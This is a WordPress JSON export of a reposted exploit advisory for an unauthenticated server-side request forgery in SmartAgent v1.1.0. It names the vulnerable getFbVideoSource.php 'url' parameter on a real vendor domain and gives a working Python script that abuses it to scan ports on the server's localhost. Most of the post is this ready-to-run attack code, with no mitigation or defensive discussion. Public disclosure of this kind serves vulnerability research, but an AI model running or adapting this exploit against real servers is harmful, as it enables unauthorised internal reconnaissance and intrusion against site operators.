{"id":60061,"date":"2024-11-02T05:13:42","date_gmt":"2024-11-02T02:13:42","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/182450\/smartagent110-ssrf.txt"},"modified":"2024-11-02T05:13:42","modified_gmt":"2024-11-02T02:13:42","slug":"smartagent-1-1-0-server-side-request-forgery","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/smartagent-1-1-0-server-side-request-forgery\/","title":{"rendered":"SmartAgent 1.1.0 Server-Side Request Forgery"},"content":{"rendered":"<p># Exploit Title: SmartAgent v1.1.0 &#8211; Server-Side Request Forgery (SSRF)<br \/># Date: 01-10-2024<br \/># Exploit Author: Alter Prime<br \/># Vendor Homepage: https:\/\/smarts-srlcom.com\/, https:\/\/smartagent.com<br \/># Version: Build v1.1.0<br \/># Tested on: Kali Linux<\/p>\n<p>An unauthenticated user can trigger the web server to perform web requests to the localhost via a GET request to the vulnerable script https:\/\/smarts-srlcom.com\/FB\/getFbVideoSource.php?url=http:\/\/127.0.0.1:80.<\/p>\n<p>The GET request includes the vulnerable parameter &#8220;url&#8221;.<\/p>\n<p>Steps To Reproduce:<br \/>1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0<\/p>\n<p>#Python Exploit<\/p>\n<p>import requests<\/p>\n<p>url = &#8220;https:\/\/smartagent.[client].com\/FB\/getFbVideoSource.php&#8221;<br \/>port = input(&#8220;Enter the port you want to check: &#8220;)<\/p>\n<p>parameter = {<br \/>&#8220;url&#8221;: &#8220;http:\/\/127.0.0.1:&#8221; + port<br \/>}<\/p>\n<p>response = requests.get(url, data=parameter, verify=False)<\/p>\n<p>if response.status_code == 200:<br \/>print(f&#8221;Port {port} is open on the server&#8221;)<br \/>else:<br \/>print(f&#8221;Port {port} closed&#8221;)<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: SmartAgent v1.1.0 &#8211; Server-Side Request Forgery (SSRF)# Date: 01-10-2024# Exploit Author: Alter Prime# Vendor Homepage: https:\/\/smarts-srlcom.com\/, https:\/\/smartagent.com# Version: Build v1.1.0# Tested on: Kali Linux An unauthenticated user can trigger the web server to perform web requests to the localhost via a GET request to the vulnerable script https:\/\/smarts-srlcom.com\/FB\/getFbVideoSource.php?url=http:\/\/127.0.0.1:80. The GET request includes &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-60061","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/60061","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=60061"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/60061\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=60061"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=60061"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=60061"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}